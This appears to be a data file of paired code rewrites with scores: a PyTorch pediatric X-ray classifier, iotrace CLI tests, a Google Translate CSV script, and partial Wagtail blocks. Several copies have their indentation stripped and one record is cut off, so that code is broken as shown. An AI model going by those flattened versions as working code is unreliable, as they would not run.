optimizer = get_optimizer(self.model.parameters(), self.cfg)
if use_lr_sch:
lr_sch = torch.optim.lr_scheduler.LambdaLR(
optimizer, lr_lambda=lrfn)
lr_hist = []
else:
lr_sch = None
best_metric = 0.0
if os.path.exists(ckp_dir) != True:
os.mkdir(ckp_dir)
if resume:
epoch_resume, iter_resume = self.load_ckp(
os.path.join(ckp_dir, 'latest.ckpt'))
else:
epoch_resume = 1
iter_resume = 0
scaler = None
if self.cfg.mix_precision:
print('Train with mix precision!')
scaler = torch.cuda.amp.GradScaler()
for epoch in range(epoch_resume-1, epochs):
start = time.time()
running_loss = AverageMeter()
n_iter = len(train_loader)
torch.set_grad_enabled(True)
self.model.train()
batch_weights = (1/iter_log)*np.ones(n_iter)
step_per_epoch = n_iter // iter_log
if n_iter % iter_log:
step_per_epoch += 1
batch_weights[-(n_iter % iter_log):] = 1 / (n_iter % iter_log)
iter_per_step = iter_log * \
np.ones(step_per_epoch, dtype=np.int16)
iter_per_step[-1] = n_iter % iter_log
else:
iter_per_step = iter_log * \
np.ones(step_per_epoch, dtype=np.int16)
i = 0
for step in range(step_per_epoch):
loop = tqdm.tqdm(
range(iter_per_step[step]), total=iter_per_step[step])
iter_loader = iter(train_loader)
for iteration in loop:
data = next(iter_loader)
imgs, labels = data[0].to(
self.device), data[1].to(self.device)
if self.cfg.mix_precision:
with torch.cuda.amp.autocast():
preds = self.model(imgs)
loss = self.metrics['loss'](preds, labels)
else:
preds = self.model(imgs)
loss = self.metrics['loss'](preds, labels)
preds = nn.Sigmoid()(preds)
running_loss.update(loss.item(), imgs.shape[0])
optimizer.zero_grad()
if self.cfg.mix_precision:
scaler.scale(loss).backward()
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
optimizer.step()
i += 1
if wandb:
wandb.log(
{'loss/train': running_loss.avg}, step=(epoch*n_iter)+(i+1))
s = "Epoch [{}/{}] Iter [{}/{}]:\n".format(
epoch+1, epochs, i+1, n_iter)
s += "{}_{} {:.3f}\n".format('train', 'loss', running_loss.avg)
running_metrics_test = self.test(
val_loader, False)
torch.set_grad_enabled(True)
self.model.train()
s = get_str(running_metrics_test, 'val', s)
if wandb:
for key in running_metrics_test.keys():
if key != 'loss':
for j, disease_class in enumerate(np.array(train_loader.dataset.disease_classes)):
wandb.log(
{key+'/'+disease_class: running_metrics_test[key][j]}, step=(epoch*n_iter)+(i+1))
else:
wandb.log(
{'loss/val': running_metrics_test['loss']}, step=(epoch*n_iter)+(i+1))
if self.cfg.type != 'chexmic':
metric_eval = running_metrics_test[eval_metric]
else:
metric_eval = running_metrics_test[eval_metric][self.id_obs]
s = s[:-1] + "- mean_"+eval_metric + \
" {:.3f}".format(metric_eval.mean())
self.save_ckp(os.path.join(
ckp_dir, 'latest.ckpt'), epoch, i)
running_loss.reset()
end = time.time()
s += " ({:.1f}s)".format(end-start)
print(s)
if metric_eval.mean() > best_metric:
best_metric = metric_eval.mean()
shutil.copyfile(os.path.join(ckp_dir, 'latest.ckpt'), os.path.join(
ckp_dir, 'best.ckpt'))
print('new checkpoint saved!')
start = time.time()
if lr_sch is not None:
lr_sch.step()
print('current lr: {:.4f}'.format(lr_sch.get_lr()[0]))
if lr_sch is not None:
return lr_hist
else:
return None
def test(self, loader, get_ci=False, n_boostrap=10000):
"""Run testing
Args:
loader (torch.utils.data.Dataloader): dataloader use for testing.
get_ci (bool, optional): whether to calculate the confidence interval. Defaults to False.
n_boostrap (int, optional): number of Bootstrap samples. Defaults to 10000.
Returns:
dict: dictionary of evaluated metrics.
"""
preds_stack, labels_stack, running_loss = self.predict_loader(
loader, cal_loss=True)
running_metrics = get_metrics(
preds_stack, labels_stack, self.metrics, self.thresh_val)
running_metrics['loss'] = running_loss
if get_ci:
ci_dict = self.eval_CI(labels_stack, preds_stack, n_boostrap)
return running_metrics, ci_dict
return running_metrics
def thresholding(self, loader):
"""Run thresholding using Youden's J statistic.
Args:
loader (torch.utils.data.Dataloader): dataloader use for thresholding.
"""
auc_opt = AUC()
preds, labels, _ = self.predict_loader(loader)
thresh_val = auc_opt(preds, labels, thresholding=True)
print(f"List optimal threshold {thresh_val}")
self.thresh_val = torch.Tensor(thresh_val).float().cuda()
def eval_CI(self, labels, preds, n_boostrap=1000, csv_path=None):
"""
Calculate confidence interval using Bootstrap Sampling.
"""
return boostrap_ci(labels, preds, self.metrics, n_boostrap, self.thresh_val, csv_path)
def stacking(self, train_loader, val_loader, epochs=10, eval_metric='auc'):
"""
Run stacking ensemble.
"""
if not isinstance(self.model, Ensemble):
raise Exception("model must be Ensemble!!!")
optimizer = get_optimizer(self.stacking_model.parameters(), self.cfg)
def lambda1(epoch): return 0.9 ** epoch
scheduler = torch.optim.lr_scheduler.LambdaLR(
optimizer, lr_lambda=lambda1)
os.makedirs(os.path.join(
'experiment', self.cfg.log_dir), exist_ok=True)
ckp_dir = os.path.join('experiment', self.cfg.log_dir, 'checkpoint')
os.makedirs(ckp_dir, exist_ok=True)
self.model.freeze()
self.stacking_model.unfreeze()
self.stacking_model.cuda()
running_loss = AverageMeter()
best_metric = 0.0
for epoch in range(epochs):
self.stacking_model.train()
for i, data in enumerate(tqdm.tqdm(train_loader)):
imgs, labels = data[0].to(self.device), data[1].to(self.device)
preds = self.stacking_model(self.model(imgs))
loss = self.metrics['loss'](preds, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
running_loss.update(loss.item(), imgs.shape[0])
s = "Epoch [{}/{}]:\n".format(
epoch+1, epochs)
s += "{}_{} {:.3f}\n".format('train', 'loss', running_loss.avg)
self.stacking_model.eval()
running_metrics = self.test(val_loader)
running_metrics.pop('loss')
s = get_str(running_metrics, 'val', s)
metric_eval = running_metrics[eval_metric]
s = s[:-1] + "- mean_"+eval_metric + \
" {:.3f}".format(metric_eval.mean())
torch.save(self.stacking_model.state_dict(),
os.path.join(ckp_dir, 'latest.ckpt'))
running_loss.reset()
scheduler.step()
print(s)
if metric_eval.mean() > best_metric:
best_metric = metric_eval.mean()
shutil.copyfile(os.path.join(ckp_dir, 'latest.ckpt'), os.path.join(
ckp_dir, 'best.ckpt'))
print('new checkpoint saved!') | model/classifier.py | import torch.nn as nn
import numpy as np
import time
import cv2
import os
import shutil
import tqdm
import torch
import wandb
from utils.metrics import AUC
from data.utils import transform
from model.models import Stacking, save_dense_backbone, load_dense_backbone, save_resnet_backbone, load_resnet_backbone, Ensemble, AverageMeter
from model.utils import get_models, get_str, tensor2numpy, get_optimizer, load_ckp, lrfn, get_metrics, get_device
from utils.confidence_interval import boostrap_ci
class Pediatric_Classifier():
def __init__(self, cfg, loss_func, metrics=None):
"""Pediatric_Classifier class used to train and evaluate model performance
Args:
cfg: contain configuration.
loss_func: Loss function.
metrics (dict, optional): dictionary contains evaluation metrics. Defaults to None.
"""
self.cfg = cfg
if self.cfg.type == 'pediatric':
self.cfg.num_classes = 13*[1]
elif self.cfg.type == 'chexmic':
self.cfg.num_classes = 14*[1]
else:
self.cfg.num_classes = [1]
self.device = get_device(self.cfg.device)
self.model = get_models(self.cfg)
if self.cfg.ensemble == 'stacking':
self.stacking_model = Stacking(len(self.model))
if os.path.isfile(self.cfg.ckp_stack):
self.stacking_model.load_state_dict(torch.load(
self.cfg.ckp_stack, map_location=torch.device("cpu")))
self.stacking_model.to(self.device)
self.stacking_model.freeze()
self.loss_func = loss_func
if metrics is not None:
self.metrics = metrics
self.metrics['loss'] = self.loss_func
else:
self.metrics = {'loss': self.loss_func}
if cfg.parallel:
self.model = torch.nn.DataParallel(self.model)
self.model.to(self.device)
self.thresh_val = torch.Tensor(
[0.5]*len(self.cfg.num_classes)).float().to(self.device)
def save_backbone(self, ckp_path):
"""
Save model backbone to ckp_path.
"""
if self.cfg.parallel:
model_part = self.model.module
else:
model_part = self.model
if self.cfg.backbone == 'dense' or self.cfg.backbone == 'densenet':
save_dense_backbone(model_part, ckp_path)
elif self.cfg.backbone == 'resnet':
save_resnet_backbone(model_part, ckp_path)
def load_backbone(self, ckp_path, strict=True):
"""
Load model backbone to ckp_path.
"""
if self.cfg.parallel:
model_part = self.model.module
else:
model_part = self.model
if self.cfg.backbone == 'dense' or self.cfg.backbone == 'densenet':
load_dense_backbone(model_part, ckp_path, self.device, strict)
elif self.cfg.backbone == 'resnet':
load_resnet_backbone(model_part, ckp_path, self.device, strict)
def load_ckp(self, ckp_path, strict=True):
"""
Load model from ckp_path.
"""
return load_ckp(self.model, ckp_path, self.device, self.cfg.parallel, strict)
def save_ckp(self, ckp_path, epoch, iter):
"""
Save model to ckp_path.
"""
if os.path.exists(os.path.dirname(ckp_path)):
torch.save(
{'epoch': epoch+1,
'iter': iter+1,
'state_dict': self.model.module.state_dict() if self.cfg.parallel else self.model.state_dict()},
ckp_path
)
else:
print("Save path not exist!!!")
def predict(self, image):
"""Run prediction
Args:
image (torch.Tensor): images to predict. Shape (batch size, C, H, W)
Returns:
torch.Tensor: model prediction
"""
self.model.eval()
with torch.no_grad() as tng:
preds = self.model(image)
if not isinstance(self.model, Ensemble) and self.cfg.ensemble == 'none':
preds = nn.Sigmoid()(preds)
elif self.cfg.ensemble == 'average':
preds = preds.mean(-1)
elif self.cfg.ensemble == 'stacking':
preds = self.stacking_model(preds)
return preds
    def predict_from_file(self, image_file):
        """Run prediction for a single image file on disk.
        Args:
            image_file (str): image path.
        Returns:
            numpy array: model prediction as a numpy array.
        """
        # read as grayscale, then apply the project's preprocessing transform
        image_gray = cv2.imread(image_file, 0)
        image = transform(image_gray, self.cfg)
        image = torch.from_numpy(image)
        image = image.unsqueeze(0)  # add the batch dimension
        # NOTE(review): predict() already applies Sigmoid when cfg.ensemble == 'none',
        # so this path would apply it twice — confirm intended. The tensor is also
        # left on CPU; verify the model lives on CPU here or move it to self.device.
        return tensor2numpy(nn.Sigmoid()(self.predict(image)))
    def predict_loader(self, loader, cal_loss=False):
        """Run prediction on a given dataloader.
        Args:
            loader (torch.utils.data.Dataloader): a dataloader.
            cal_loss (bool): whether to calculate the loss. Defaults to False.
        Returns:
            torch.Tensor, torch.Tensor, float: stacked predictions, stacked labels,
            average loss (0 unless cal_loss=True).
        """
        preds_stack = []
        labels_stack = []
        running_loss = AverageMeter()
        ova_len = loader.dataset.n_data  # NOTE(review): unused (only referenced by commented-out code)
        loop = tqdm.tqdm(enumerate(loader), total=len(loader))
        for i, data in loop:
            imgs, labels = data[0].to(self.device), data[1].to(self.device)
            if self.cfg.tta:
                # Test-time augmentation: each sample carries several augmented views
                # along dim 1; flatten the views into the batch dimension, predict
                # once, then regroup and average the per-view predictions.
                # imgs = torch.cat(imgs, dim=0)
                list_imgs = [imgs[:, j] for j in range(imgs.shape[1])]
                imgs = torch.cat(list_imgs, dim=0)
                preds = self.predict(imgs)
                batch_len = labels.shape[0]
                list_preds = [preds[batch_len*j:batch_len *
                                    (j+1)] for j in range(len(list_imgs))]
                preds = torch.stack(list_preds, dim=0).mean(dim=0)
            else:
                preds = self.predict(imgs)
            preds_stack.append(preds)
            labels_stack.append(labels)
            if cal_loss:
                # running_loss.append(self.metrics['loss'](
                #     preds, labels).item()*iter_len/ova_len)
                running_loss.update(self.metrics['loss'](
                    preds, labels).item(), imgs.shape[0])
        preds_stack = torch.cat(preds_stack, 0)
        labels_stack = torch.cat(labels_stack, 0)
        return preds_stack, labels_stack, running_loss.avg
def train(self, train_loader, val_loader, epochs=10, iter_log=100, use_lr_sch=False, resume=False, ckp_dir='./experiment/checkpoint',
eval_metric='auc'):
"""Run training
Args:
train_loader (torch.utils.data.Dataloader): dataloader use for training
val_loader (torch.utils.data.Dataloader): dataloader use for validation
epochs (int, optional): number of training epochs. Defaults to 120.
iter_log (int, optional): logging iteration. Defaults to 100.
use_lr_sch (bool, optional): use learning rate scheduler. Defaults to False.
resume (bool, optional): resume training process. Defaults to False.
ckp_dir (str, optional): path to checkpoint directory. Defaults to './experiment/checkpoint'.
eval_metric (str, optional): name of metric for validation. Defaults to 'loss'.
"""
wandb.init(name=self.cfg.log_dir,
project='Pediatric Multi-label Classifier')
optimizer = get_optimizer(self.model.parameters(), self.cfg)
if use_lr_sch:
lr_sch = torch.optim.lr_scheduler.LambdaLR(
optimizer, lr_lambda=lrfn)
lr_hist = []
else:
lr_sch = None
best_metric = 0.0
if os.path.exists(ckp_dir) != True:
os.mkdir(ckp_dir)
if resume:
epoch_resume, iter_resume = self.load_ckp(
os.path.join(ckp_dir, 'latest.ckpt'))
else:
epoch_resume = 1
iter_resume = 0
scaler = None
if self.cfg.mix_precision:
print('Train with mix precision!')
scaler = torch.cuda.amp.GradScaler()
for epoch in range(epoch_resume-1, epochs):
start = time.time()
running_loss = AverageMeter()
n_iter = len(train_loader)
torch.set_grad_enabled(True)
self.model.train()
batch_weights = (1/iter_log)*np.ones(n_iter)
step_per_epoch = n_iter // iter_log
if n_iter % iter_log:
step_per_epoch += 1
batch_weights[-(n_iter % iter_log):] = 1 / (n_iter % iter_log)
iter_per_step = iter_log * \
np.ones(step_per_epoch, dtype=np.int16)
iter_per_step[-1] = n_iter % iter_log
else:
iter_per_step = iter_log * \
np.ones(step_per_epoch, dtype=np.int16)
i = 0
for step in range(step_per_epoch):
loop = tqdm.tqdm(
range(iter_per_step[step]), total=iter_per_step[step])
iter_loader = iter(train_loader)
for iteration in loop:
data = next(iter_loader)
imgs, labels = data[0].to(
self.device), data[1].to(self.device)
if self.cfg.mix_precision:
with torch.cuda.amp.autocast():
preds = self.model(imgs)
loss = self.metrics['loss'](preds, labels)
else:
preds = self.model(imgs)
loss = self.metrics['loss'](preds, labels)
preds = nn.Sigmoid()(preds)
running_loss.update(loss.item(), imgs.shape[0])
optimizer.zero_grad()
if self.cfg.mix_precision:
scaler.scale(loss).backward()
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
optimizer.step()
i += 1
if wandb:
wandb.log(
{'loss/train': running_loss.avg}, step=(epoch*n_iter)+(i+1))
s = "Epoch [{}/{}] Iter [{}/{}]:\n".format(
epoch+1, epochs, i+1, n_iter)
s += "{}_{} {:.3f}\n".format('train', 'loss', running_loss.avg)
running_metrics_test = self.test(
val_loader, False)
torch.set_grad_enabled(True)
self.model.train()
s = get_str(running_metrics_test, 'val', s)
if wandb:
for key in running_metrics_test.keys():
if key != 'loss':
for j, disease_class in enumerate(np.array(train_loader.dataset.disease_classes)):
wandb.log(
{key+'/'+disease_class: running_metrics_test[key][j]}, step=(epoch*n_iter)+(i+1))
else:
wandb.log(
{'loss/val': running_metrics_test['loss']}, step=(epoch*n_iter)+(i+1))
if self.cfg.type != 'chexmic':
metric_eval = running_metrics_test[eval_metric]
else:
metric_eval = running_metrics_test[eval_metric][self.id_obs]
s = s[:-1] + "- mean_"+eval_metric + \
" {:.3f}".format(metric_eval.mean())
self.save_ckp(os.path.join(
ckp_dir, 'latest.ckpt'), epoch, i)
running_loss.reset()
end = time.time()
s += " ({:.1f}s)".format(end-start)
print(s)
if metric_eval.mean() > best_metric:
best_metric = metric_eval.mean()
shutil.copyfile(os.path.join(ckp_dir, 'latest.ckpt'), os.path.join(
ckp_dir, 'best.ckpt'))
print('new checkpoint saved!')
start = time.time()
if lr_sch is not None:
lr_sch.step()
print('current lr: {:.4f}'.format(lr_sch.get_lr()[0]))
if lr_sch is not None:
return lr_hist
else:
return None
def test(self, loader, get_ci=False, n_boostrap=10000):
"""Run testing
Args:
loader (torch.utils.data.Dataloader): dataloader use for testing.
get_ci (bool, optional): whether to calculate the confidence interval. Defaults to False.
n_boostrap (int, optional): number of Bootstrap samples. Defaults to 10000.
Returns:
dict: dictionary of evaluated metrics.
"""
preds_stack, labels_stack, running_loss = self.predict_loader(
loader, cal_loss=True)
running_metrics = get_metrics(
preds_stack, labels_stack, self.metrics, self.thresh_val)
running_metrics['loss'] = running_loss
if get_ci:
ci_dict = self.eval_CI(labels_stack, preds_stack, n_boostrap)
return running_metrics, ci_dict
return running_metrics
def thresholding(self, loader):
"""Run thresholding using Youden's J statistic.
Args:
loader (torch.utils.data.Dataloader): dataloader use for thresholding.
"""
auc_opt = AUC()
preds, labels, _ = self.predict_loader(loader)
thresh_val = auc_opt(preds, labels, thresholding=True)
print(f"List optimal threshold {thresh_val}")
self.thresh_val = torch.Tensor(thresh_val).float().cuda()
def eval_CI(self, labels, preds, n_boostrap=1000, csv_path=None):
"""
Calculate confidence interval using Bootstrap Sampling.
"""
return boostrap_ci(labels, preds, self.metrics, n_boostrap, self.thresh_val, csv_path)
    def stacking(self, train_loader, val_loader, epochs=10, eval_metric='auc'):
        """Train the stacking head on top of a frozen Ensemble.
        Args:
            train_loader (torch.utils.data.Dataloader): dataloader for training the head.
            val_loader (torch.utils.data.Dataloader): dataloader for validation.
            epochs (int, optional): number of epochs. Defaults to 10.
            eval_metric (str, optional): metric used to select the best checkpoint. Defaults to 'auc'.
        Raises:
            Exception: if the wrapped model is not an Ensemble.
        """
        if not isinstance(self.model, Ensemble):
            raise Exception("model must be Ensemble!!!")
        # only the stacking head is optimized; the base models stay frozen below
        optimizer = get_optimizer(self.stacking_model.parameters(), self.cfg)
        # exponential learning-rate decay: lr * 0.9**epoch
        def lambda1(epoch): return 0.9 ** epoch
        scheduler = torch.optim.lr_scheduler.LambdaLR(
            optimizer, lr_lambda=lambda1)
        os.makedirs(os.path.join(
            'experiment', self.cfg.log_dir), exist_ok=True)
        ckp_dir = os.path.join('experiment', self.cfg.log_dir, 'checkpoint')
        os.makedirs(ckp_dir, exist_ok=True)
        self.model.freeze()
        self.stacking_model.unfreeze()
        self.stacking_model.cuda()  # NOTE(review): assumes CUDA; elsewhere .to(self.device) is used
        running_loss = AverageMeter()
        best_metric = 0.0
        for epoch in range(epochs):
            self.stacking_model.train()
            for i, data in enumerate(tqdm.tqdm(train_loader)):
                imgs, labels = data[0].to(self.device), data[1].to(self.device)
                # base ensemble produces per-model outputs; the head combines them
                preds = self.stacking_model(self.model(imgs))
                loss = self.metrics['loss'](preds, labels)
                optimizer.zero_grad()
                loss.backward()
                optimizer.step()
                running_loss.update(loss.item(), imgs.shape[0])
            s = "Epoch [{}/{}]:\n".format(
                epoch+1, epochs)
            s += "{}_{} {:.3f}\n".format('train', 'loss', running_loss.avg)
            self.stacking_model.eval()
            # validation routes through self.test() -> predict() -> stacking head
            running_metrics = self.test(val_loader)
            running_metrics.pop('loss')
            s = get_str(running_metrics, 'val', s)
            metric_eval = running_metrics[eval_metric]
            s = s[:-1] + "- mean_"+eval_metric + \
                " {:.3f}".format(metric_eval.mean())
            torch.save(self.stacking_model.state_dict(),
                       os.path.join(ckp_dir, 'latest.ckpt'))
            running_loss.reset()
            scheduler.step()
            print(s)
            # keep a copy of the best checkpoint according to the mean eval metric
            if metric_eval.mean() > best_metric:
                best_metric = metric_eval.mean()
                shutil.copyfile(os.path.join(ckp_dir, 'latest.ckpt'), os.path.join(
                    ckp_dir, 'best.ckpt'))
print('new checkpoint saved!') | 0.84367 | 0.24659 |
import pytest
from core.test_run import TestRun
from iotrace import IotracePlugin
from utils.installer import insert_module
def test_help():
    """CLI smoke test: `iotrace -H` must exit successfully."""
    TestRun.LOGGER.info("Testing cli help")
    result = TestRun.executor.run('iotrace -H')
    if result.exit_code != 0:
        raise Exception("Failed to run executable")
def test_version():
    """The binary's reported version must match the loaded kernel module's version."""
    # Make sure module is loaded
    insert_module()
    TestRun.LOGGER.info("Testing cli version")
    version_output = TestRun.executor.run('iotrace -V')
    parsed = TestRun.plugins['iotrace'].parse_json(version_output.stdout)
    bin_version = parsed[0]['trace']
    TestRun.LOGGER.info("iotrace binary version is: " + str(parsed[0]['trace']))
    TestRun.LOGGER.info("OCTF library version is: " + str(parsed[1]['trace']))
    module_output = TestRun.executor.run("cat /sys/module/iotrace/version")
    if module_output.exit_code != 0:
        raise Exception("Could not find module version")
    module_version = module_output.stdout
    TestRun.LOGGER.info("Module version is: " + module_version)
    if bin_version != module_version:
        raise Exception("Mismatching executable and module versions")
def test_module_loaded():
    """lsmod must list the iotrace kernel module after insertion."""
    # Make sure module is loaded
    insert_module()
    TestRun.LOGGER.info("Testing iotrace kernel module loading")
    result = TestRun.executor.run('lsmod | grep iotrace')
    if result.exit_code != 0:
        raise Exception("Failed to find loaded iotrace kernel module")
def test_trace_start_stop():
    """Start tracing, stop it, and verify the trace reaches the COMPLETE state."""
    TestRun.LOGGER.info("Testing starting and stopping of tracing")
    iotrace: IotracePlugin = TestRun.plugins['iotrace']
    iotrace.start_tracing()
    if not iotrace.stop_tracing():
        raise Exception("Could not stop active tracing.")
    trace_path = iotrace.get_latest_trace_path()
    parsed_summary = iotrace.parse_json(iotrace.get_trace_summary(trace_path))
    if parsed_summary[0]['state'] != "COMPLETE":
        raise Exception("Trace state is not complete")
# TODO (trybicki) test for sanity checking installation, e.g. validating install_manifest. | tests/security/test_sanity.py |
import pytest
from core.test_run import TestRun
from iotrace import IotracePlugin
from utils.installer import insert_module
def test_help():
TestRun.LOGGER.info("Testing cli help")
output = TestRun.executor.run('iotrace -H')
if output.exit_code != 0:
raise Exception("Failed to run executable")
def test_version():
# Make sure module is loaded
insert_module()
TestRun.LOGGER.info("Testing cli version")
output = TestRun.executor.run('iotrace -V')
parsed = TestRun.plugins['iotrace'].parse_json(output.stdout)
bin_version = parsed[0]['trace']
TestRun.LOGGER.info("iotrace binary version is: " + str(parsed[0]['trace']))
TestRun.LOGGER.info("OCTF library version is: " + str(parsed[1]['trace']))
output = TestRun.executor.run("cat /sys/module/iotrace/version")
if output.exit_code != 0:
raise Exception("Could not find module version")
module_version = output.stdout
TestRun.LOGGER.info("Module version is: " + module_version)
if bin_version != module_version:
raise Exception("Mismatching executable and module versions")
def test_module_loaded():
# Make sure module is loaded
insert_module()
TestRun.LOGGER.info("Testing iotrace kernel module loading")
output = TestRun.executor.run('lsmod | grep iotrace')
if output.exit_code != 0:
raise Exception("Failed to find loaded iotrace kernel module")
def test_trace_start_stop():
TestRun.LOGGER.info("Testing starting and stopping of tracing")
iotrace: IotracePlugin = TestRun.plugins['iotrace']
iotrace.start_tracing()
stopped = iotrace.stop_tracing()
if not stopped:
raise Exception("Could not stop active tracing.")
trace_path = iotrace.get_latest_trace_path()
summary = iotrace.get_trace_summary(trace_path)
summary_parsed = iotrace.parse_json(summary)
if summary_parsed[0]['state'] != "COMPLETE":
raise Exception("Trace state is not complete")
# TODO (trybicki) test for sanity checking installation, e.g. validating install_manifest. | 0.229104 | 0.356923 |
import pandas as pd
from google.cloud import translate
import os
import numpy as np
import csv
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = r'/Users/hbae/PycharmProjects/keraconocr/venv/credentials2.json'
def test():
    """Translate the spell-checked column of the dataset to English and write
    (ID, translation) rows to translated.csv."""
    df = pd.read_csv('/Users/hbae/PycharmProjects/keraconocr/venv/Final_Data_v2_Cleansing_spell_checked_deleted.csv')
    count = df.shape[0]
    # context manager so the file is closed even if a translation call fails mid-way
    # (the original left the handle open on any exception)
    with open("/Users/hbae/PycharmProjects/keraconocr/venv/translated.csv", 'w', newline='', encoding='utf-8-sig') as out_file:
        wr = csv.writer(out_file)
        header = ["ID", "번역"]
        wr.writerow(header)
        for i in range(count):
            text = df['Spell_Checked_Content'][i]
            print(text)
            translated = str(translate_text(text))
            # renamed from `list`/`file` to avoid shadowing builtins
            row = [i, translated]
            print(translated)
            wr.writerow(row)
# 번역
def translate_text(text):
    """Translate *text* into English via the Google Cloud Translation API."""
    # Instantiates a client
    client = translate.Client()
    # The target language
    target = 'en'
    response = client.translate(
        text,
        target_language=target)
    return response['translatedText']
#print(u'Target Lang: {}'.format(target))
#print(u'Text: {}'.format(text))
#print(u'Translation: {}'.format(translation['translatedText']))
#번역한거랑 전체데이터 합쳐주는 함수
def merge():
    """Join the translated rows back onto the full dataset on the ID column."""
    translated_df = pd.read_csv("/Users/hbae/PycharmProjects/keraconocr/venv/translated.csv")
    full_df = pd.read_csv("/Users/hbae/PycharmProjects/keraconocr/venv/Final_Data_Cleansing_v2 복사본.csv")
    # normalise the join-key column names on both frames
    full_df.rename(columns={'Unnamed: 0': 'ID'}, inplace=True)
    translated_df.rename(columns={'번': 'ID'}, inplace=True)
    print(full_df.columns.values[0])
    merged = full_df.merge(translated_df, on='ID')
    print(merged)
    merged.to_csv("/Users/hbae/PycharmProjects/keraconocr/venv/output.csv", index=False)
#nan 포함된 행 없애주는 함수
def delete():
    """Drop every row containing NaN and save the cleaned CSV."""
    cleaned = pd.read_csv('/Users/hbae/PycharmProjects/keraconocr/venv/Final_Data_v2_Cleansing_v2_spell_checked.csv').dropna(axis=0)
    cleaned.to_csv('/Users/hbae/PycharmProjects/keraconocr/venv/Final_Data_v2_Cleansing_spell_checked_deleted.csv', index=False)
if __name__ == '__main__':
test() | collect/csvTotxt.py | import pandas as pd
from google.cloud import translate
import os
import numpy as np
import csv
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = r'/Users/hbae/PycharmProjects/keraconocr/venv/credentials2.json'
def test():
df = pd.read_csv('/Users/hbae/PycharmProjects/keraconocr/venv/Final_Data_v2_Cleansing_spell_checked_deleted.csv')
#print(df['Image_Content_txt'][0])
count = df.shape[0]
file=open("/Users/hbae/PycharmProjects/keraconocr/venv/translated.csv", 'w', newline='', encoding='utf-8-sig')
wr = csv.writer(file)
header = ["ID", "번역"]
wr.writerow(header)
for i in range(count):
text = df['Spell_Checked_Content'][i]
print(text)
translated = str(translate_text(text))
list = [i, translated]
print(translated)
wr.writerow(list)
file.close()
# 번역
def translate_text(text):
# Instantiates a client
translate_client = translate.Client()
# The text to translate
#text = u'Hello, world!'
# The target language
target = 'en'
# Translates some text into Russian
translation = translate_client.translate(
text,
target_language=target)
translated_text = translation['translatedText']
return translated_text
#print(u'Target Lang: {}'.format(target))
#print(u'Text: {}'.format(text))
#print(u'Translation: {}'.format(translation['translatedText']))
#번역한거랑 전체데이터 합쳐주는 함수
def merge():
b = pd.read_csv("/Users/hbae/PycharmProjects/keraconocr/venv/translated.csv")
a = pd.read_csv("/Users/hbae/PycharmProjects/keraconocr/venv/Final_Data_Cleansing_v2 복사본.csv")
a.rename(columns={'Unnamed: 0':'ID'}, inplace = True)
b.rename(columns={'번': 'ID'}, inplace=True)
print(a.columns.values[0])
merged = a.merge(b, on='ID')
print(merged)
merged.to_csv("/Users/hbae/PycharmProjects/keraconocr/venv/output.csv", index=False)
#nan 포함된 행 없애주는 함수
def delete():
df = pd.read_csv('/Users/hbae/PycharmProjects/keraconocr/venv/Final_Data_v2_Cleansing_v2_spell_checked.csv')
df = df.dropna(axis=0)
df.to_csv('/Users/hbae/PycharmProjects/keraconocr/venv/Final_Data_v2_Cleansing_spell_checked_deleted.csv', index=False)
if __name__ == '__main__':
test() | 0.079859 | 0.064742 |
from django.utils.translation import ugettext_lazy as _
from wagtail.core import blocks
from wagtail.images.blocks import ImageChooserBlock
__all__ = ['LinkBlock', 'Badge', 'Button', 'FAB', 'Breadcrumb', 'Card', 'Collection', 'Icon', 'Preloader']
class LinkStructValue(blocks.StructValue):
    """StructValue that resolves a link's destination URL."""

    def url(self):
        """Prefer the explicit external URL, else fall back to the chosen page's URL."""
        external_url = self.get('external_url')
        if external_url:
            return external_url
        page = self.get('page')
        if page:
            return page.url
class LinkBlock(blocks.StructBlock):
    """Link block ('a' tag) with the options to link to a page or external url. This block also has an icon option."""
    # optional Material-Icons icon rendered with the link text
    icon = blocks.CharBlock(max_length=50, required=False,
                            help_text='Material-Icons icon name')
    text = blocks.CharBlock(label="link text", required=True)
    # destination: an internal page, with the external URL as fallback
    # (resolution logic lives in LinkStructValue.url)
    page = blocks.PageChooserBlock(label="page", required=False,
                                   help_text="Link to an existing page.")
    external_url = blocks.URLBlock(label="external URL", required=False,
                                   help_text="Alternative external link if a page is not set.")

    class Meta:
        icon = 'site'
        value_class = LinkStructValue
        template = 'wagtail_materializecss/components/link_block.html'
        label = _('Link')
class Badge(blocks.StructBlock):
    """Badge ('span' tag) that notifies user that an item is unread."""
    # count shown inside the badge
    number = blocks.IntegerBlock()
    # presumably toggles Materialize's "new" badge styling — template-dependent
    is_new = blocks.BooleanBlock()

    class Meta:
        label = _('Badge')
        template = 'wagtail_materializecss/components/badge.html'
class Button(LinkBlock):
    """Button ('a' tag) is a link block that can have a set color."""
    # color name passed to the template; empty string means default styling
    color = blocks.CharBlock(max_length=25, default='', blank=True, required=False)

    class Meta:
        icon = 'link'
        value_class = LinkStructValue
        label = _('Button')
        template = 'wagtail_materializecss/components/button.html'
class FAB(blocks.StructBlock):
    """Floating action button. This block only has an icon, color, and link. This block has no text!"""
    color = blocks.CharBlock(max_length=25, default='', blank=True, required=False)
    icon = blocks.CharBlock(max_length=50, required=False,
                            help_text='Material-Icons icon name')
    # same page/external-URL fallback pair as LinkBlock, resolved by LinkStructValue
    page = blocks.PageChooserBlock(label="page", required=False,
                                   help_text="Link to an existing page.")
    external_url = blocks.URLBlock(label="external URL", required=False,
                                   help_text="Alternative external link if a page is not set.")

    class Meta:
        icon = 'plus-inverse'
        value_class = LinkStructValue
        template = 'wagtail_materializecss/components/fab.html'
        label = _('Floating Action Button')
class Breadcrumb(blocks.ListBlock):
    """Breadcrumb showing the page hierarchy: a list of links pointing back to the root page."""

    def __init__(self, child_block=None, **kwargs):
        # default the list's child block to a LinkBlock when none is supplied
        if child_block is None:
            child_block = LinkBlock()
        super().__init__(child_block, **kwargs)

    class Meta:
        label = _('Breadcrumb')
        template = 'wagtail_materializecss/components/breadcrumb.html'
class Card(blocks.StructBlock):
    """Card to display content in many different ways."""
    title = blocks.CharBlock(default='', blank=True)
    content = blocks.RichTextBlock(default='', blank=True)
    # BUGFIX: 'reqiured' typo meant the intended required=False was silently ignored
    actions = blocks.ListBlock(LinkBlock(label=_('Card Action')), default=[], blank=True, required=False)
